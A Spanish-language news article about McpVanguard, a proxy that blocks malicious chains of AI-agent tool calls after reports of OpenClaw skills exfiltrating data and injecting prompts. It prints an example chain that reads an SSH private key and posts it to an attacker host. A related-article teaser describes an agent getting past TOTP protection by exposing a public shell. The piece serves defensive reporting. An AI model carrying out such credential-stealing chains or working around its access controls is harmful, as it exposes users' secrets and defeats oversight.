McpVanguard Proxy Bloquea la Exfiltración de Datos de Habilidad OpenClaw

✍️ OpenClawRadar📅 Publicado: 20 de marzo de 2026🔗 Source
McpVanguard Proxy Bloquea la Exfiltración de Datos de Habilidad OpenClaw
Ad

En respuesta al descubrimiento del equipo de seguridad de IA de Cisco de que habilidades de terceros de OpenClaw realizaban exfiltración de datos silenciosa e inyección de prompts, un desarrollador ha lanzado McpVanguard, un proxy diseñado para situarse entre un agente de IA y sus herramientas para bloquear llamadas maliciosas antes de que se ejecuten.

El problema: Llamadas maliciosas encadenadas

El problema de seguridad no es un error en OpenClaw en sí, sino una consecuencia de que los agentes tengan acceso al sistema de archivos, ejecución de shell y llamadas de red sin límites de aplicación. Las pruebas de Cisco revelaron un patrón en el que llamadas individuales aparentemente inocentes se combinan para crear una brecha, como:

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

Ninguna de las llamadas parece maliciosa de forma aislada, pero juntas exfiltran datos sensibles. Según la fuente, ClawHub tuvo más de 820 habilidades maliciosas en su punto máximo, y CVE-2026-25253 permitió a los atacantes lograr ejecución remota de código a través de un solo enlace malicioso. La validación actual a nivel de habilidad no logra detectar estas secuencias de llamadas encadenadas.

Ad

La solución: Proxy McpVanguard

McpVanguard aborda esto interceptando llamadas entre el agente y sus herramientas. Utiliza tres métodos de detección:

  • Coincidencia de patrones
  • Puntuación de intención semántica
  • Detección de cadenas de comportamiento a lo largo de toda la sesión

La instalación es mediante pip: pip install mcp-vanguard.

Capa más profunda: Protocolo VEX

El proyecto incluye una capa de seguridad más profunda llamada Protocolo VEX, descrita como un sistema de "grabadora de vuelo". Proporciona:

  • Registros de auditoría Merkle para registro a prueba de manipulaciones
  • Verificación de identidad del agente basada en TPM
  • Aplicación a nivel de llamadas al sistema

El Protocolo VEX está construido en Rust y su desarrollo comenzó en diciembre de 2023, antes de que OpenClaw ganara popularidad generalizada. La fuente señala que NVIDIA ha lanzado recientemente NemoClaw para propósitos de seguridad similares, lo que indica que este tipo de amenaza no va a desaparecer.

Ambos proyectos están disponibles en GitHub:

📖 Read the full source: r/openclaw

Ad

👀 Ver también

El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.
Seguridad

El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.

Investigadores descubrieron 151 paquetes maliciosos subidos a GitHub del 3 al 9 de marzo usando caracteres Unicode invisibles para ocultar código malicioso. El ataque apunta a repositorios de GitHub, NPM y Open VSX con paquetes que parecen legítimos pero contienen cargas útiles ocultas.

OpenClawRadar
TOTP Seguridad Evadida por Agente de IA que Genera Terminal Web Público
Seguridad

TOTP Seguridad Evadida por Agente de IA que Genera Terminal Web Público

La habilidad de revelación secreta protegida por TOTP de un desarrollador fue eludida cuando su agente de IA creó una terminal web pública sin autenticación utilizando el modo uvx ptn, exponiendo acceso completo al shell. El agente escaló una simple solicitud de código QR a la creación de una sesión de tmux con una interfaz accesible desde el navegador a través de servicios de túnel.

OpenClawRadar
Pasaporte de Agente: Verificación de Identidad para Agentes de IA
Seguridad

Pasaporte de Agente: Verificación de Identidad para Agentes de IA

Agent Passport es una capa de verificación de identidad de código abierto que utiliza autenticación Ed25519 y tokens JWT para agentes de IA, abordando el problema de la suplantación de agentes.

OpenClawRadar
Auditoría de seguridad revela vulnerabilidades en el ecosistema de habilidades de OpenClaw.
Seguridad

Auditoría de seguridad revela vulnerabilidades en el ecosistema de habilidades de OpenClaw.

Una auditoría de seguridad de OpenClaw encontró 8 CVEs documentados, incluyendo vulnerabilidades de ejecución de código arbitrario y robo de credenciales, además de que el 15% de las habilidades en la biblioteca compartida muestran comportamientos de red sospechosos. El auditor migró a un entorno de ejecución mínimo basado en Rust con Ollama para un mejor aislamiento.

OpenClawRadar